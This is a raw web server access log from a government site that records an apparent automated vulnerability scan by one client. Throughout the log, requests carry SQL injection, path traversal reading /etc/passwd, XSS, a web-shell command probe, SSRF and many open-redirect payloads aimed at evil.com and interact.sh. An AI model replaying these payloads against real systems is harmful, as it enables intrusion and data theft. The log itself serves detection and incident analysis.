Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.1+Safari/537.36 - 200 0 0 205 2023-10-15 08:40:26 103.153.214.94 GET /en/WEB-INF/web.xml;.js - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+10.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 200 0 0 204 2023-10-15 08:44:03 103.153.214.94 POST /client - 443 - 193.123.37.162 Mozilla/5.0+(X11;+Ubuntu;+Linux+i686+on+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/53.0.2820.59+Safari/537.36 - 405 0 1 203 2023-10-15 08:44:45 103.153.214.94 POST / - 443 - 193.123.37.162 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1847.137+Safari/4E423F https://bcvt.kontum.gov.vn 405 0 1 207 2023-10-15 08:45:57 103.153.214.94 GET / - 443 - 45.76.176.46 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/85.0.4183.102+Safari/537.36 - 200 0 0 56 2023-10-15 08:46:22 103.153.214.94 GET /script/ - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2117.157+Safari/537.36 - 200 0 0 202 2023-10-15 08:46:28 103.153.214.94 GET /jenkins/script - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 200 0 0 200 2023-10-15 08:58:34 103.153.214.94 GET /adjuncts/3a890183/ - 443 - 193.123.37.162 Mozilla/5.0+(X11;+Ubuntu;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/55.0.2919.83+Safari/537.36 - 200 0 0 204 2023-10-15 09:10:08 103.153.214.94 GET /C6/Jhsoft.Web.module/testbill/dj/download.asp filename=/c6/web.config 443 - 193.123.37.162 Mozilla/5.0+(X11;+OpenBSD+i386)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.125+Safari/537.36 - 200 0 0 204 2023-10-15 09:12:58 103.153.214.94 GET /index.php option=com_departments&id=-1%20UNION%20SELECT%201,md5(999999999),3,4,5,6,7,8-- 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2062.124+Safari/537.36 - 200 0 0 201 2023-10-15 09:15:38 103.153.214.94 GET /index.php option=com_jvehicles&controller=../../../../../../../../../../etc/passwd%00 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/70.0.3538.77+Safari/537.36 - 200 0 0 203 2023-10-15 09:17:16 103.153.214.94 GET /servicedesk/customer/user/signup - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2228.0+Safari/537.36 - 200 0 0 206 2023-10-15 09:17:22 103.153.214.94 POST /servicedesk/customer/user/signup - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+4.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 https://bcvt.kontum.gov.vn/servicedesk/customer/user/signup 405 0 1 202 2023-10-15 09:17:27 103.153.214.94 GET /secure/Signup!default.jspa - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 200 0 0 201 2023-10-15 09:17:32 103.153.214.94 POST /secure/Signup.jspa - 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.1+Safari/537.36 https://bcvt.kontum.gov.vn/secure/Signup.jspa 405 0 1 201 2023-10-15 09:21:26 103.153.214.94 POST /api/terminals - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 404 0 2 217 2023-10-15 09:21:59 103.153.214.94 GET /onlinePreview url=aHR0cDovL29hc3QuZnVuL3JvYm90cy50eHQ= 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+10.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 200 0 0 203 2023-10-15 09:22:02 103.153.214.94 GET / - 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/54.0.2866.71+Safari/537.36 - 200 0 0 204 2023-10-15 09:23:49 103.153.214.94 GET /_ignition/scripts/--><svg+onload=alert(document.domain)> - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/40.0.2214.93+Safari/537.36 - 200 0 0 626 2023-10-15 09:26:34 103.153.214.94 GET /var/resource_config.json - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2228.0+Safari/537.36 - 200 0 0 212 2023-10-15 09:30:47 103.153.214.94 GET /dev/tests/functional/credentials.xml.dist - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 200 0 0 203 2023-10-15 09:30:53 103.153.214.94 GET /dev/tests/functional/etc/config.xml.dist - 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_4)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/49.0.2656.18+Safari/537.36 - 200 0 0 203 2023-10-15 09:43:24 103.153.214.94 POST /plugin/add - 443 - 193.123.37.162 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1847.137+Safari/4E423F - 405 0 1 210 2023-10-15 09:43:31 103.153.214.94 POST /plugin/customMethod - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.3319.102+Safari/537.36 - 405 0 1 202 2023-10-15 09:46:19 103.153.214.94 POST /mifs/j_spring_security_check - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.3319.102+Safari/537.36 https://bcvt.kontum.gov.vn/mifs/user/login.jsp 405 0 1 203 2023-10-15 09:54:02 103.153.214.94 GET /filter/jmol/js/jsmol/php/jsmol.php call=getRawDataFromDatabase&query=file:///etc/passwd 443 - 193.123.37.162 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 200 0 0 206 2023-10-15 09:58:15 103.153.214.94 GET /filter/jmol/js/jsmol/php/jsmol.php call=saveFile&data=%3Cscript%3Ealert(%27XSS%27)%3C/script%3E&mimetype=text/html 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2117.157+Safari/537.36 - 200 0 0 204 2023-10-15 10:00:22 103.153.214.94 GET /mod/lti/auth.php redirect_uri=javascript:alert('2WfF0eTn4zAkBAHOwbQN65ZkXUn') 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2224.3+Safari/537.36 - 200 0 0 207 2023-10-15 10:05:29 103.153.214.94 GET /data/manage/cmd.php cmd=id 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2309.372+Safari/537.36 - 200 0 0 205 2023-10-15 10:05:46 103.153.214.94 GET /data/ - 443 - 193.123.37.162 Mozilla/5.0+(X11;+Ubuntu;+Linux+i686+on+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/53.0.2820.59+Safari/537.36 - 200 0 0 202 2023-10-15 10:07:26 103.153.214.94 GET /webadmin/authportal/bounce.php url=https://interact.sh/ 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.3;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 200 0 0 209 2023-10-15 10:09:39 103.153.214.94 GET /webadmin/reporter/view_server_log.php server=localhost&act=stats&filename&offset=1&offset&count=1000&sortorder&log=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&sortitem&filter 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2224.3+Safari/537.36 - 200 0 0 205 2023-10-15 10:09:59 103.153.214.94 POST /index/gettunnel - 443 - 193.123.37.162 Mozilla/5.0+(X11;+Ubuntu;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/55.0.2919.83+Safari/537.36 - 405 0 1 201 2023-10-15 10:11:24 103.153.214.94 GET /evil.com/%2e%2e%2f - 443 - 193.123.37.162 Mozilla/5.0+(X11;+OpenBSD+i386)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.125+Safari/537.36 - 404 11 0 822 2023-10-15 10:11:30 103.153.214.94 GET /evil.com - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2224.3+Safari/537.36 - 200 0 0 206 2023-10-15 10:11:36 103.153.214.94 GET / - 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1944.0+Safari/537.36 - 200 0 0 208 2023-10-15 10:11:43 103.153.214.94 GET /https:/ - 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_4)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/49.0.2656.18+Safari/537.36 - 200 0 0 200 2023-10-15 10:11:57 103.153.214.94 GET /.evil.com - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2224.3+Safari/537.36 - 200 0 0 202 2023-10-15 10:12:03 103.153.214.94 GET /evil.com - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+4.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 200 0 0 201 2023-10-15 10:12:10 103.153.214.94 GET /;@evil.com - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.3;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 200 0 0 203 2023-10-15 10:12:17 103.153.214.94 GET /evil.com - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+10.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 200 0 0 200 2023-10-15 10:12:24 103.153.214.94 GET /evil.com - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+10.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 200 0 0 205 2023-10-15 10:12:30 103.153.214.94 GET / - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 200 0 0 206 2023-10-15 10:12:37 103.153.214.94 GET /evil.com@/ - 443 - 193.123.37.162 Mozilla/5.0+(X11;+OpenBSD+i386)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.125+Safari/537.36 - 200 0 0 200 2023-10-15 10:12:44 103.153.214.94 GET /https:/ - 443 - 193.123.37.162 Mozilla/5.0+(X11;+Ubuntu;+Linux+i686+on+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/53.0.2820.59+Safari/537.36 - 200 0 0 201 2023-10-15 10:12:51 103.153.214.94 GET /;@evil.com - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 200 0 0 200 2023-10-15 10:12:58 103.153.214.94 GET /evil.com/ - 443 - 193.123.37.162 Mozilla/5.0+(X11;+Ubuntu;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/55.0.2919.83+Safari/537.36 - 200 0 0 205 2023-10-15 10:13:05 103.153.214.94 GET /@evil.com - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 200 0 0 203 2023-10-15 10:13:12 103.153.214.94 GET /evil.com - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2226.0+Safari/537.36 - 200 0 0 200 2023-10-15 10:13:20 103.153.214.94 GET /tevil.com/ - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.4;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 200 0 0 201 2023-10-15 10:13:28 103.153.214.94 GET / - 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2062.124+Safari/537.36 - 200 0 0 207 2023-10-15 10:13:35 103.153.214.94 GET /evil.com/ - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 200 0 0 201 2023-10-15 10:13:42 103.153.214.94 GET /interact.sh - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 200 0 0 200 2023-10-15 10:13:50 103.153.214.94 GET /evil.com@/ - 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.1+Safari/537.36 - 200 0 0 205 2023-10-15 10:13:58 103.153.214.94 GET /evil.com/tevil.com/ - 443 - 193.123.37.162 Mozilla/5.0+(X11;+Ubuntu;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/55.0.2919.83+Safari/537.36 - 200 0 0 201 2023-10-15 10:14:06 103.153.214.94 GET /https:/evil.com@/ - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2228.0+Safari/537.36 - 200 0 0 202 2023-10-15 10:14:14 103.153.214.94 GET /<>/evil.com - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 200 0 0 206 2023-10-15 10:14:22 103.153.214.94 GET /evil.com/ - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/40.0.2214.93+Safari/537.36 - 200 0 0 206 2023-10-15 10:14:30 103.153.214.94 GET /evil.com - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/70.0.3538.77+Safari/537.36 - 200 0 0 202 2023-10-15 10:14:38 103.153.214.94 GET /evil.com - 443 - 193.123.37.162 Mozilla/5.0+(X11;+Ubuntu;+Linux+i686+on+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/53.0.2820.59+Safari/537.36 - 200 0 0 206 2023-10-15 10:14:46 103.153.214.94 GET /evil.com - 443 - 193.123.37.162 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1847.137+Safari/4E423F - 200 0 0 199 2023-10-15 10:14:54 103.153.214.94 GET / - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1866.237+Safari/537.36 - 200 0 0 205 2023-10-15 10:15:03 103.153.214.94 GET /evil.com/ - 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/54.0.2866.71+Safari/537.36 - 200 0 0 200 2023-10-15 10:15:12 103.153.214.94 GET /evil.com/..;/css - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 200 0 0 201 2023-10-15 10:15:21 103.153.214.94 GET /https:evil.com - 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_4)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/49.0.2656.18+Safari/537.36 - 200 0 0 201 2023-10-15 10:15:30 103.153.214.94 GET /https:/bcvt.kontum.gov.vnevil.com/ - 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_4)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/49.0.2656.18+Safari/537.36 - 200 0 0 203 2023-10-15 10:15:40 103.153.214.94 GET /〱evil.com - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2224.3+Safari/537.36 - 200 0 0 201 2023-10-15 10:15:50 103.153.214.94 GET /〵evil.com - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+10.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 200 0 0 200 2023-10-15 10:16:00 103.153.214.94 GET /ゝevil.com - 443 - 193.123.37.162 Mozilla/5.0+(X11;+Ubuntu;+Linux+i686+on+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/53.0.2820.59+Safari/537.36 - 200 0 0 203 2023-10-15 10:16:10 103.153.214.94 GET /ーevil.com - 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1944.0+Safari/537.36 - 200 0 0 201 2023-10-15 10:16:20 103.153.214.94 GET /ーevil.com - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.3;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 200 0 0 204 2023-10-15 10:16:30 103.153.214.94 GET /<>/evil.com - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/40.0.2214.93+Safari/537.36 - 200 0 0 202 2023-10-15 10:16:40 103.153.214.94 GET /@evil.com - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.3319.102+Safari/537.36 - 200 0 0 202 2023-10-15 10:16:51 103.153.214.94 GET /@https:/evil.com - 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/52.0.2762.73+Safari/537.36 - 200 0 0 202 2023-10-15 10:17:02 103.153.214.94 GET /evil.com/ - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 200 0 0 201 2023-10-15 10:17:13 103.153.214.94 GET /evil。com - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/70.0.3538.77+Safari/537.36 - 200 0 0 203 2023-10-15 10:17:24 103.153.214.94 GET /evil.com - 443 - 193.123.37.162 Mozilla/5.0+(X11;+Ubuntu;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/55.0.2919.83+Safari/537.36 - 200 0 0 201 2023-10-15 10:17:35 103.153.214.94 GET /evil.com/ - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 200 0 0 205 2023-10-15 10:17:46 103.153.214.94 GET /evil.com/ - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2224.3+Safari/537.36 - 200 0 0 202 2023-10-15 10:17:56 103.153.214.94 GET /evil.com;@ - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2224.3+Safari/537.36 - 200 0 0 203 2023-10-15 10:18:06 103.153.214.94 GET /https:/evil.com/ - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 200 0 0 199 2023-10-15 10:18:46 103.153.214.94 GET /https:/.evil.com/ - 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2062.124+Safari/537.36 - 200 0 0 208 2023-10-15 10:18:55 103.153.214.94 GET /https:/?.evil.com/ - 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2062.124+Safari/537.36 - 200 0 0 201 2023-10-15 10:19:04 103.153.214.94 GET /https:/.evil.com/ - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1866.237+Safari/537.36 - 200 0 0 200 2023-10-15 10:19:14 103.153.214.94 GET /https:/evil.com@ - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1866.237+Safari/537.36 - 200 0 0 199 2023-10-15 10:19:23 103.153.214.94 GET /https:/#.evil.com/ - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+4.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 200 0 0 201 2023-10-15 10:19:31 103.153.214.94 GET /https:/.evil.com - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+4.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 200 0 0 201 2023-10-15 10:19:39 103.153.214.94 GET /https:/evil.com - 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1944.0+Safari/537.36 - 200 0 0 205 2023-10-15 10:19:47 103.153.214.94 GET /https:/evil.com - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 200 0 0 201 2023-10-15 10:19:54 103.153.214.94 GET /https:/ - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2117.157+Safari/537.36 - 200 0 0 200 2023-10-15 10:20:01 103.153.214.94 GET /https:/ - 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1944.0+Safari/537.36 - 200 0 0 199 2023-10-15 10:20:08 103.153.214.94 GET /https:/ - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.3;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 200 0 0 201 2023-10-15 10:20:15 103.153.214.94 GET /https:/ - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/40.0.2214.93+Safari/537.36 - 200 0 0 199 2023-10-15 10:20:23 103.153.214.94 GET /https:/:80 - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 200 0 0 200 2023-10-15 10:20:30 103.153.214.94 GET /https:/:80 @evil.com/ 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2309.372+Safari/537.36 - 200 0 0 201 2023-10-15 10:20:37 103.153.214.94 GET /https:/:@/@evil.com - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2228.0+Safari/537.36 - 200 0 0 200 2023-10-15 10:20:44 103.153.214.94 GET /https:/:@evil.com/@evil.com - 443 - 193.123.37.162 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 200 0 0 200 2023-10-15 10:20:51 103.153.214.94 GET /https:/;@evil.com - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 200 0 0 200 2023-10-15 10:20:57 103.153.214.94 GET /https:/tevil.com/ - 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/54.0.2866.71+Safari/537.36 - 200 0 0 200 2023-10-15 10:21:04 103.153.214.94 GET /https:/evil.com/evil.com - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2226.0+Safari/537.36 - 200 0 0 201 2023-10-15 10:21:11 103.153.214.94 GET /https:/evil.com/https:/evil.com/ - 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1944.0+Safari/537.36 - 200 0 0 199 2023-10-15 10:21:18 103.153.214.94 GET /https:/www./.evil.com - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.3;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 200 0 0 201 2023-10-15 10:21:24 103.153.214.94 GET /https:/evil.com - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2309.372+Safari/537.36 - 200 0 0 206 2023-10-15 10:21:31 103.153.214.94 GET /https:/evil.com - 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.1+Safari/537.36 - 200 0 0 200 2023-10-15 10:21:37 103.153.214.94 GET /https:/evil.com - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 200 0 0 205 2023-10-15 10:21:44 103.153.214.94 GET /https:evil.com - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.2;+WOW64)+AppleWebKit/537.36+(KHTML+like+Gecko)+Chrome/44.0.2403.155+Safari/537.36 - 200 0 0 204 2023-10-15 10:21:50 103.153.214.94 GET /https:/bcvt.kontum.gov.vnevil.com - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+10.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 200 0 0 205 2023-10-15 10:22:00 103.153.214.94 GET /〱evil.com - 443 - 193.123.37.162 Mozilla/5.0+(X11;+Ubuntu;+Linux+i686+on+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/53.0.2820.59+Safari/537.36 - 200 0 0 201 2023-10-15 10:22:05 103.153.214.94 GET /〵evil.com - 443 - 193.123.37.162 